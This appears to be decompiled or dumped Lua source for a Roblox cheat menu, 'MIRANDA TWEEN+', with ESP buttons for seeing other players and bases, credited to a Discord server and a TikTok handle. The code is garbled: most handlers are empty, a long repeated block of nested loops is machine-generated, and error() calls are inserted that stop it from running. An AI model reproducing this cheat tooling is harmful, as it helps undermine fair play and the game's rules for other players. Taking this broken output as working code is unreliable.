-- ts file was generated at discord.gg/25ms


local _call3 = game:GetService("Players")
local _call5 = game:GetService("ReplicatedStorage")
local _call7 = game:GetService("UserInputService")
local _call9 = game:GetService("Workspace")
local _call11 = game:GetService("ProximityPromptService")
local _LocalPlayer12 = _call3["LocalPlayer"]
local _call16 = task["spawn"](function(_17, _17_2, _17_3, _17_4, _17_5)
    local _ = task.wait(1)
    for _22, _22_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
        local _call24 = _22_2:FindFirstChild("PlotSign")
        local _call26 = _call24:FindFirstChild("YourBase")
        local _Enabled28 = _call24["YourBase"]["Enabled"]
        local _Name29 = _22_2["Name"]
        for _34, _34_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
            for _37, _37_2 in pairs(_34_2:GetDescendants()) do
            end
        end
        local _ = task.wait(1)
        for _42, _42_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
            local _call44 = _42_2:FindFirstChild("PlotSign")
            local _call46 = _call44:FindFirstChild("YourBase")
            local _Enabled48 = _call44["YourBase"]["Enabled"]
            local _Name49 = _42_2["Name"]
            for _54, _54_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                for _57, _57_2 in pairs(_54_2:GetDescendants()) do
                end
            end
            local _ = task.wait(1)
            for _62, _62_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                local _call64 = _62_2:FindFirstChild("PlotSign")
                local _call66 = _call64:FindFirstChild("YourBase")
                local _Enabled68 = _call64["YourBase"]["Enabled"]
                local _Name69 = _62_2["Name"]
                for _74, _74_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                    for _77, _77_2 in pairs(_74_2:GetDescendants()) do
                    end
                end
                local _ = task.wait(1)
                for _82, _82_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                    local _call84 = _82_2:FindFirstChild("PlotSign")
                    local _call86 = _call84:FindFirstChild("YourBase")
                    local _Enabled88 = _call84["YourBase"]["Enabled"]
                    local _Name89 = _82_2["Name"]
                    for _94, _94_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                        for _97, _97_2 in pairs(_94_2:GetDescendants()) do
                        end
                    end
                    local _ = task.wait(1)
                    for _102, _102_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                        local _call104 = _102_2:FindFirstChild("PlotSign")
                        local _call106 = _call104:FindFirstChild("YourBase")
                        local _Enabled108 = _call104["YourBase"]["Enabled"]
                        local _Name109 = _102_2["Name"]
                        for _114, _114_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                            for _117, _117_2 in pairs(_114_2:GetDescendants()) do
                            end
                        end
                        local _ = task.wait(1)
                        for _122, _122_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                            local _call124 = _122_2:FindFirstChild("PlotSign")
                            local _call126 = _call124:FindFirstChild("YourBase")
                            local _Enabled128 = _call124["YourBase"]["Enabled"]
                            local _Name129 = _122_2["Name"]
                            for _134, _134_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                for _137, _137_2 in pairs(_134_2:GetDescendants()) do
                                end
                            end
                            local _ = task.wait(1)
                            for _142, _142_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                local _call144 = _142_2:FindFirstChild("PlotSign")
                                local _call146 = _call144:FindFirstChild("YourBase")
                                local _Enabled148 = _call144["YourBase"]["Enabled"]
                                local _Name149 = _142_2["Name"]
                                for _154, _154_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                    for _157, _157_2 in pairs(_154_2:GetDescendants()) do
                                    end
                                end
                                local _ = task.wait(1)
                                for _162, _162_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                    local _call164 = _162_2:FindFirstChild("PlotSign")
                                    local _call166 = _call164:FindFirstChild("YourBase")
                                    local _Enabled168 = _call164["YourBase"]["Enabled"]
                                    local _Name169 = _162_2["Name"]
                                    for _174, _174_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                        for _177, _177_2 in pairs(_174_2:GetDescendants()) do
                                        end
                                    end
                                    local _ = task.wait(1)
                                    for _182, _182_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                        local _call184 = _182_2:FindFirstChild("PlotSign")
                                        local _call186 = _call184:FindFirstChild("YourBase")
                                        local _Enabled188 = _call184["YourBase"]["Enabled"]
                                        local _Name189 = _182_2["Name"]
                                        for _194, _194_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                            for _197, _197_2 in pairs(_194_2:GetDescendants()) do
                                            end
                                        end
                                        local _ = task.wait(1)
                                        for _202, _202_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                            local _call204 = _202_2:FindFirstChild("PlotSign")
                                            local _call206 = _call204:FindFirstChild("YourBase")
                                            local _Enabled208 = _call204["YourBase"]["Enabled"]
                                            local _Name209 = _202_2["Name"]
                                            for _214, _214_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                for _217, _217_2 in pairs(_214_2:GetDescendants()) do
                                                end
                                            end
                                            local _ = task.wait(1)
                                            for _222, _222_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                local _call224 = _222_2:FindFirstChild("PlotSign")
                                                local _call226 = _call224:FindFirstChild("YourBase")
                                                local _Enabled228 = _call224["YourBase"]["Enabled"]
                                                local _Name229 = _222_2["Name"]
                                                for _234, _234_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                    for _237, _237_2 in pairs(_234_2:GetDescendants()) do
                                                    end
                                                end
                                                local _ = task.wait(1)
                                                for _242, _242_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                    local _call244 = _242_2:FindFirstChild("PlotSign")
                                                    local _call246 = _call244:FindFirstChild("YourBase")
                                                    local _Enabled248 = _call244["YourBase"]["Enabled"]
                                                    local _Name249 = _242_2["Name"]
                                                    for _254, _254_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                        for _257, _257_2 in pairs(_254_2:GetDescendants()) do
                                                        end
                                                    end
                                                    local _ = task.wait(1)
                                                    for _262, _262_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                        local _call264 = _262_2:FindFirstChild("PlotSign")
                                                        local _call266 = _call264:FindFirstChild("YourBase")
                                                        local _Enabled268 = _call264["YourBase"]["Enabled"]
                                                        local _Name269 = _262_2["Name"]
                                                        for _274, _274_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                            for _277, _277_2 in pairs(_274_2:GetDescendants()) do
                                                            end
                                                        end
                                                        local _ = task.wait(1)
                                                        for _282, _282_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                            local _call284 = _282_2:FindFirstChild("PlotSign")
                                                            local _call286 = _call284:FindFirstChild("YourBase")
                                                            local _Enabled288 = _call284["YourBase"]["Enabled"]
                                                            local _Name289 = _282_2["Name"]
                                                            for _294, _294_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                for _297, _297_2 in pairs(_294_2:GetDescendants()) do
                                                                end
                                                            end
                                                            local _ = task.wait(1)
                                                            for _302, _302_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                local _call304 = _302_2:FindFirstChild("PlotSign")
                                                                local _call306 = _call304:FindFirstChild("YourBase")
                                                                local _Enabled308 = _call304["YourBase"]["Enabled"]
                                                                local _Name309 = _302_2["Name"]
                                                                for _314, _314_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                    for _317, _317_2 in pairs(_314_2:GetDescendants()) do
                                                                    end
                                                                end
                                                                local _ = task.wait(1)
                                                                for _322, _322_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                    local _call324 = _322_2:FindFirstChild("PlotSign")
                                                                    local _call326 = _call324:FindFirstChild("YourBase")
                                                                    local _Enabled328 = _call324["YourBase"]["Enabled"]
                                                                    local _Name329 = _322_2["Name"]
                                                                    for _334, _334_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                        for _337, _337_2 in pairs(_334_2:GetDescendants()) do
                                                                        end
                                                                    end
                                                                    local _ = task.wait(1)
                                                                    for _342, _342_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                        local _call344 = _342_2:FindFirstChild("PlotSign")
                                                                        local _call346 = _call344:FindFirstChild("YourBase")
                                                                        local _Enabled348 = _call344["YourBase"]["Enabled"]
                                                                        local _Name349 = _342_2["Name"]
                                                                        for _354, _354_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                            for _357, _357_2 in pairs(_354_2:GetDescendants()) do
                                                                            end
                                                                        end
                                                                        local _ = task.wait(1)
                                                                        for _362, _362_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                            local _call364 = _362_2:FindFirstChild("PlotSign")
                                                                            local _call366 = _call364:FindFirstChild("YourBase")
                                                                            local _Enabled368 = _call364["YourBase"]["Enabled"]
                                                                            local _Name369 = _362_2["Name"]
                                                                            for _374, _374_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                for _377, _377_2 in pairs(_374_2:GetDescendants()) do
                                                                                end
                                                                            end
                                                                            local _ = task.wait(1)
                                                                            for _382, _382_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                local _call384 = _382_2:FindFirstChild("PlotSign")
                                                                                local _call386 = _call384:FindFirstChild("YourBase")
                                                                                local _Enabled388 = _call384["YourBase"]["Enabled"]
                                                                                local _Name389 = _382_2["Name"]
                                                                                for _394, _394_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                    for _397, _397_2 in pairs(_394_2:GetDescendants()) do
                                                                                    end
                                                                                end
                                                                                local _ = task.wait(1)
                                                                                for _402, _402_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                    local _call404 = _402_2:FindFirstChild("PlotSign")
                                                                                    local _call406 = _call404:FindFirstChild("YourBase")
                                                                                    local _Enabled408 = _call404["YourBase"]["Enabled"]
                                                                                    local _Name409 = _402_2["Name"]
                                                                                    for _414, _414_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                        for _417, _417_2 in pairs(_414_2:GetDescendants()) do
                                                                                        end
                                                                                    end
                                                                                    local _ = task.wait(1)
                                                                                    for _422, _422_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                        local _call424 = _422_2:FindFirstChild("PlotSign")
                                                                                        local _call426 = _call424:FindFirstChild("YourBase")
                                                                                        local _Enabled428 = _call424["YourBase"]["Enabled"]
                                                                                        local _Name429 = _422_2["Name"]
                                                                                        for _434, _434_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                            for _437, _437_2 in pairs(_434_2:GetDescendants()) do
                                                                                            end
                                                                                        end
                                                                                        local _ = task.wait(1)
                                                                                        for _442, _442_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                            local _call444 = _442_2:FindFirstChild("PlotSign")
                                                                                            local _call446 = _call444:FindFirstChild("YourBase")
                                                                                            local _Enabled448 = _call444["YourBase"]["Enabled"]
                                                                                            local _Name449 = _442_2["Name"]
                                                                                            for _454, _454_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                for _457, _457_2 in pairs(_454_2:GetDescendants()) do
                                                                                                end
                                                                                            end
                                                                                            local _ = task.wait(1)
                                                                                            for _462, _462_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                local _call464 = _462_2:FindFirstChild("PlotSign")
                                                                                                local _call466 = _call464:FindFirstChild("YourBase")
                                                                                                local _Enabled468 = _call464["YourBase"]["Enabled"]
                                                                                                local _Name469 = _462_2["Name"]
                                                                                                for _474, _474_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                    for _477, _477_2 in pairs(_474_2:GetDescendants()) do
                                                                                                    end
                                                                                                end
                                                                                                local _ = task.wait(1)
                                                                                                for _482, _482_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                    local _call484 = _482_2:FindFirstChild("PlotSign")
                                                                                                    local _call486 = _call484:FindFirstChild("YourBase")
                                                                                                    local _Enabled488 = _call484["YourBase"]["Enabled"]
                                                                                                    local _Name489 = _482_2["Name"]
                                                                                                    for _494, _494_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                        for _497, _497_2 in pairs(_494_2:GetDescendants()) do
                                                                                                        end
                                                                                                    end
                                                                                                    local _ = task.wait(1)
                                                                                                    for _502, _502_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                        local _call504 = _502_2:FindFirstChild("PlotSign")
                                                                                                        local _call506 = _call504:FindFirstChild("YourBase")
                                                                                                        local _Enabled508 = _call504["YourBase"]["Enabled"]
                                                                                                        local _Name509 = _502_2["Name"]
                                                                                                        for _514, _514_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                            for _517, _517_2 in pairs(_514_2:GetDescendants()) do
                                                                                                            end
                                                                                                        end
                                                                                                        local _ = task.wait(1)
                                                                                                        for _522, _522_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                            local _call524 = _522_2:FindFirstChild("PlotSign")
                                                                                                            local _call526 = _call524:FindFirstChild("YourBase")
                                                                                                            local _Enabled528 = _call524["YourBase"]["Enabled"]
                                                                                                            local _Name529 = _522_2["Name"]
                                                                                                            for _534, _534_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                for _537, _537_2 in pairs(_534_2:GetDescendants()) do
                                                                                                                end
                                                                                                            end
                                                                                                            local _ = task.wait(1)
                                                                                                            for _542, _542_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                local _call544 = _542_2:FindFirstChild("PlotSign")
                                                                                                                local _call546 = _call544:FindFirstChild("YourBase")
                                                                                                                local _Enabled548 = _call544["YourBase"]["Enabled"]
                                                                                                                local _Name549 = _542_2["Name"]
                                                                                                                for _554, _554_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                    for _557, _557_2 in pairs(_554_2:GetDescendants()) do
                                                                                                                    end
                                                                                                                end
                                                                                                                local _ = task.wait(1)
                                                                                                                for _562, _562_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                    local _call564 = _562_2:FindFirstChild("PlotSign")
                                                                                                                    local _call566 = _call564:FindFirstChild("YourBase")
                                                                                                                    local _Enabled568 = _call564["YourBase"]["Enabled"]
                                                                                                                    local _Name569 = _562_2["Name"]
                                                                                                                    for _574, _574_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                        for _577, _577_2 in pairs(_574_2:GetDescendants()) do
                                                                                                                        end
                                                                                                                    end
                                                                                                                    local _ = task.wait(1)
                                                                                                                    for _582, _582_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                        local _call584 = _582_2:FindFirstChild("PlotSign")
                                                                                                                        local _call586 = _call584:FindFirstChild("YourBase")
                                                                                                                        local _Enabled588 = _call584["YourBase"]["Enabled"]
                                                                                                                        local _Name589 = _582_2["Name"]
                                                                                                                        for _594, _594_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                            for _597, _597_2 in pairs(_594_2:GetDescendants()) do
                                                                                                                            end
                                                                                                                        end
                                                                                                                        local _ = task.wait(1)
                                                                                                                        for _602, _602_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                            local _call604 = _602_2:FindFirstChild("PlotSign")
                                                                                                                            local _call606 = _call604:FindFirstChild("YourBase")
                                                                                                                            local _Enabled608 = _call604["YourBase"]["Enabled"]
                                                                                                                            local _Name609 = _602_2["Name"]
                                                                                                                            for _614, _614_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                for _617, _617_2 in pairs(_614_2:GetDescendants()) do
                                                                                                                                end
                                                                                                                            end
                                                                                                                            local _ = task.wait(1)
                                                                                                                            for _622, _622_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                local _call624 = _622_2:FindFirstChild("PlotSign")
                                                                                                                                local _call626 = _call624:FindFirstChild("YourBase")
                                                                                                                                local _Enabled628 = _call624["YourBase"]["Enabled"]
                                                                                                                                local _Name629 = _622_2["Name"]
                                                                                                                                for _634, _634_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                    for _637, _637_2 in pairs(_634_2:GetDescendants()) do
                                                                                                                                    end
                                                                                                                                end
                                                                                                                                local _ = task.wait(1)
                                                                                                                                for _642, _642_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                    local _call644 = _642_2:FindFirstChild("PlotSign")
                                                                                                                                    local _call646 = _call644:FindFirstChild("YourBase")
                                                                                                                                    local _Enabled648 = _call644["YourBase"]["Enabled"]
                                                                                                                                    local _Name649 = _642_2["Name"]
                                                                                                                                    for _654, _654_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                        for _657, _657_2 in pairs(_654_2:GetDescendants()) do
                                                                                                                                        end
                                                                                                                                    end
                                                                                                                                    local _ = task.wait(1)
                                                                                                                                    for _662, _662_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                        local _call664 = _662_2:FindFirstChild("PlotSign")
                                                                                                                                        local _call666 = _call664:FindFirstChild("YourBase")
                                                                                                                                        local _Enabled668 = _call664["YourBase"]["Enabled"]
                                                                                                                                        local _Name669 = _662_2["Name"]
                                                                                                                                        for _674, _674_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                            for _677, _677_2 in pairs(_674_2:GetDescendants()) do
                                                                                                                                            end
                                                                                                                                        end
                                                                                                                                        local _ = task.wait(1)
                                                                                                                                        for _682, _682_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                            local _call684 = _682_2:FindFirstChild("PlotSign")
                                                                                                                                            local _call686 = _call684:FindFirstChild("YourBase")
                                                                                                                                            local _Enabled688 = _call684["YourBase"]["Enabled"]
                                                                                                                                            local _Name689 = _682_2["Name"]
                                                                                                                                            for _694, _694_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                for _697, _697_2 in pairs(_694_2:GetDescendants()) do
                                                                                                                                                end
                                                                                                                                            end
                                                                                                                                            local _ = task.wait(1)
                                                                                                                                            for _702, _702_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                local _call704 = _702_2:FindFirstChild("PlotSign")
                                                                                                                                                local _call706 = _call704:FindFirstChild("YourBase")
                                                                                                                                                local _Enabled708 = _call704["YourBase"]["Enabled"]
                                                                                                                                                local _Name709 = _702_2["Name"]
                                                                                                                                                for _714, _714_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                    for _717, _717_2 in pairs(_714_2:GetDescendants()) do
                                                                                                                                                    end
                                                                                                                                                end
                                                                                                                                                local _ = task.wait(1)
                                                                                                                                                for _722, _722_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                    local _call724 = _722_2:FindFirstChild("PlotSign")
                                                                                                                                                    local _call726 = _call724:FindFirstChild("YourBase")
                                                                                                                                                    local _Enabled728 = _call724["YourBase"]["Enabled"]
                                                                                                                                                    local _Name729 = _722_2["Name"]
                                                                                                                                                    for _734, _734_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                        for _737, _737_2 in pairs(_734_2:GetDescendants()) do
                                                                                                                                                        end
                                                                                                                                                    end
                                                                                                                                                    local _ = task.wait(1)
                                                                                                                                                    for _742, _742_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                        local _call744 = _742_2:FindFirstChild("PlotSign")
                                                                                                                                                        local _call746 = _call744:FindFirstChild("YourBase")
                                                                                                                                                        local _Enabled748 = _call744["YourBase"]["Enabled"]
                                                                                                                                                        local _Name749 = _742_2["Name"]
                                                                                                                                                        for _754, _754_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                            for _757, _757_2 in pairs(_754_2:GetDescendants()) do
                                                                                                                                                            end
                                                                                                                                                        end
                                                                                                                                                        local _ = task.wait(1)
                                                                                                                                                        for _762, _762_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                            local _call764 = _762_2:FindFirstChild("PlotSign")
                                                                                                                                                            local _call766 = _call764:FindFirstChild("YourBase")
                                                                                                                                                            local _Enabled768 = _call764["YourBase"]["Enabled"]
                                                                                                                                                            local _Name769 = _762_2["Name"]
                                                                                                                                                            for _774, _774_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                                for _777, _777_2 in pairs(_774_2:GetDescendants()) do
                                                                                                                                                                end
                                                                                                                                                            end
                                                                                                                                                            local _ = task.wait(1)
                                                                                                                                                            for _782, _782_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                                local _call784 = _782_2:FindFirstChild("PlotSign")
                                                                                                                                                                local _call786 = _call784:FindFirstChild("YourBase")
                                                                                                                                                                local _Enabled788 = _call784["YourBase"]["Enabled"]
                                                                                                                                                                local _Name789 = _782_2["Name"]
                                                                                                                                                                for _794, _794_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                                    for _797, _797_2 in pairs(_794_2:GetDescendants()) do
                                                                                                                                                                    end
                                                                                                                                                                end
                                                                                                                                                                local _ = task.wait(1)
                                                                                                                                                                for _802, _802_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                                    local _call804 = _802_2:FindFirstChild("PlotSign")
                                                                                                                                                                    local _call806 = _call804:FindFirstChild("YourBase")
                                                                                                                                                                    local _Enabled808 = _call804["YourBase"]["Enabled"]
                                                                                                                                                                    local _Name809 = _802_2["Name"]
                                                                                                                                                                    for _814, _814_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                                        for _817, _817_2 in pairs(_814_2:GetDescendants()) do
                                                                                                                                                                        end
                                                                                                                                                                    end
                                                                                                                                                                    local _ = task.wait(1)
                                                                                                                                                                    for _822, _822_2 in pairs(_call9:FindFirstChild("Plots"):GetChildren()) do
                                                                                                                                                                        local _call824 = _822_2:FindFirstChild("PlotSign")
                                                                                                                                                                        local _call826 = _call824:FindFirstChild("YourBase")
                                                                                                                                                                        local _Enabled828 = _call824["YourBase"]["Enabled"]
                                                                                                                                                                        local _Name829 = _822_2["Name"]
                                                                                                                                                                        local er = error("internal 542: <25ms: infinitelooperror>")
                                                                                                                                                                    end
                                                                                                                                                                end
                                                                                                                                                            end
                                                                                                                                                        end
                                                                                                                                                    end
                                                                                                                                                end
                                                                                                                                            end
                                                                                                                                        end
                                                                                                                                    end
                                                                                                                                end
                                                                                                                            end
                                                                                                                        end
                                                                                                                    end
                                                                                                                end
                                                                                                            end
                                                                                                        end
                                                                                                    end
                                                                                                end
                                                                                            end
                                                                                        end
                                                                                    end
                                                                                end
                                                                            end
                                                                        end
                                                                    end
                                                                end
                                                            end
                                                        end
                                                    end
                                                end
                                            end
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
    end
end)
local _call833 = _call3["PlayerRemoving"]:Connect(function(_834, _834_2, _834_3, _834_4, _834_5, _834_6)

end)
local _call837 = _call11["PromptButtonHoldBegan"]:Connect(function(_838, _838_2, _838_3, _838_4, _838_5, _838_6)

end)
local _call841 = _call11["PromptButtonHoldEnded"]:Connect(function(_842, _842_2)

end)
local _call845 = _call11["PromptTriggered"]:Connect(function(_846, _846_2, _846_3, _846_4, _846_5)

end)
local _call849 = _LocalPlayer12["CharacterAdded"]:Connect(function(_850, _850_2, _850_3)
    local _call853 = _LocalPlayer12["Character"]:FindFirstChildOfClass("Humanoid")
    _call853["PlatformStand"] = false
end)
local _call862 = _call5:WaitForChild("Packages"):WaitForChild("Net"):WaitForChild("RE/UseItem")["OnClientEvent"]:Connect(function(_863, _863_2, _863_3, _863_4, _863_5)

end)
local _call868 = game:GetService("RunService")["Heartbeat"]:Connect(function(_869, _869_2, _869_3)

end)
local _call871 = Instance["new"]("ScreenGui", _LocalPlayer12:WaitForChild("PlayerGui"))
_call871["ResetOnSpawn"] = false
_call871["Name"] = "MirandaTweenPlus_FULL_INSTANT"
local _call873 = Instance["new"]("Frame", _call871)
_call873["Size"] = UDim2["new"](0, 180, 0, 225)
_call873["Position"] = UDim2["new"](0.5, - 90, 0.5, - 112)
_call873["BackgroundColor3"] = Color3["fromRGB"](20, 20, 20)
_call873["BackgroundTransparency"] = 0.15
_call873["BorderSizePixel"] = 0
_call873["Name"] = "VIPMenu"
_call873["Visible"] = false
local _call881 = Instance["new"]("UICorner", _call873)
_call881["CornerRadius"] = UDim["new"](0, 14)
local _call885 = Instance["new"]("UIStroke", _call873)
_call885["Thickness"] = 3
_call885["Transparency"] = 0.15
local _call887 = task["spawn"](function()
    local _ = task.wait(0.11)
    local _891, _891_2, _891_3 = math.sin((tick() * 1.4))
    local er = error("line 1: attempt to compare number < table")
end)
local _call893 = Instance["new"]("TextLabel", _call873)
_call893["Size"] = UDim2["new"](1, 0, 0, 22)
_call893["Text"] = "MIRANDA TWEEN+"
_call893["TextColor3"] = Color3["fromRGB"](255, 0, 60)
_call893["Font"] = Enum["Font"]["Arcade"]
_call893["TextSize"] = 15
_call893["BackgroundTransparency"] = 1
_call893["Position"] = UDim2["new"](0, 0, 0, 0)
_call893["Parent"] = _call873
local _call903 = Instance["new"]("TextLabel", _call873)
_call903["Size"] = UDim2["new"](1, - 20, 0, 14)
_call903["Position"] = UDim2["new"](0, 10, 0, 22)
_call903["BackgroundTransparency"] = 1
_call903["Text"] = "TIKTOK: @mirandacallruim"
_call903["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call903["Font"] = Enum["Font"]["Arcade"]
_call903["TextSize"] = 12
_call903["TextXAlignment"] = Enum["TextXAlignment"]["Center"]
_call903["Parent"] = _call873
local _call915 = Instance["new"]("TextLabel", _call873)
_call915["Size"] = UDim2["new"](0.9, 0, 0, 15)
_call915["Position"] = UDim2["new"](0.05, 0, 1, - 18)
_call915["BackgroundTransparency"] = 1
_call915["Font"] = Enum["Font"]["Arcade"]
_call915["TextColor3"] = Color3["fromRGB"](255, 0, 60)
_call915["TextSize"] = 11
_call915["Text"] = ""
_call915["TextTransparency"] = 1
_call915["Parent"] = _call873
local _call925 = Instance["new"]("TextButton", _call873)
_call925["Size"] = UDim2["new"](0.455, - 2, 0, 22)
_call925["Position"] = UDim2["new"](0.04, 0, 0, 38)
_call925["BackgroundColor3"] = Color3["fromRGB"](200, 0, 60)
_call925["Text"] = "ESP GOD"
_call925["Font"] = Enum["Font"]["Arcade"]
_call925["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call925["TextSize"] = 12
_call925["BorderSizePixel"] = 0
local _call937 = Instance["new"]("UICorner", _call925)
_call937["CornerRadius"] = UDim["new"](0, 8)
local _call942 = _call925["MouseButton1Click"]:Connect(function(_943)
    _call925["BackgroundColor3"] = Color3["fromRGB"](250, 80, 80)
    _call915["Text"] = "ESP GOD ativado!"
    _call915["TextColor3"] = Color3["fromRGB"](200, 0, 60)
    _call915["TextTransparency"] = 0
end)
local _call949 = Instance["new"]("TextButton", _call873)
_call949["Size"] = UDim2["new"](0.455, - 2, 0, 22)
_call949["Position"] = UDim2["new"](0.535, 2, 0, 38)
_call949["BackgroundColor3"] = Color3["fromRGB"](0, 0, 0)
_call949["Text"] = "ESP SECRET"
_call949["Font"] = Enum["Font"]["Arcade"]
_call949["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call949["TextSize"] = 12
_call949["BorderSizePixel"] = 0
local _call961 = Instance["new"]("UICorner", _call949)
_call961["CornerRadius"] = UDim["new"](0, 8)
local _call966 = _call949["MouseButton1Click"]:Connect(function(_967, _967_2)
    _call949["BackgroundColor3"] = Color3["fromRGB"](250, 60, 60)
    _call915["Text"] = "ESP SECRET ativado!"
    _call915["TextColor3"] = Color3["fromRGB"](255, 0, 60)
    _call915["TextTransparency"] = 0
end)
local _call973 = Instance["new"]("TextButton", _call873)
_call973["Size"] = UDim2["new"](0.9, 0, 0, 30)
_call973["Position"] = UDim2["new"](0.05, 0, 0, 66)
_call973["BackgroundColor3"] = Color3["fromRGB"](220, 0, 60)
_call973["Text"] = "ESP BASE"
_call973["Font"] = Enum["Font"]["Arcade"]
_call973["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call973["TextSize"] = 15
_call973["BorderSizePixel"] = 0
local _call985 = Instance["new"]("UICorner", _call973)
_call985["CornerRadius"] = UDim["new"](0, 8)
local _call990 = _call973["MouseButton1Click"]:Connect(function(_991, _991_2)
    _call973["BackgroundColor3"] = Color3["fromRGB"](250, 0, 60)
    _call915["Text"] = "ESP BASE ativado!"
    _call915["TextColor3"] = Color3["fromRGB"](220, 0, 60)
    _call915["TextTransparency"] = 0
end)
local _call997 = Instance["new"]("TextButton", _call873)
_call997["Size"] = UDim2["new"](0.9, 0, 0, 28)
_call997["Position"] = UDim2["new"](0.05, 0, 0, 102)
_call997["BackgroundColor3"] = Color3["fromRGB"](80, 0, 0)
_call997["Text"] = "ESP PLAYER"
_call997["Font"] = Enum["Font"]["Arcade"]
_call997["TextColor3"] = Color3["fromRGB"](255, 255, 255)
_call997["TextSize"] = 15
_call997["BorderSizePixel"] = 0
local _call1009 = Instance["new"]("UICorner", _call997)
_call1009["CornerRadius"] = UDim["new"](0, 8)
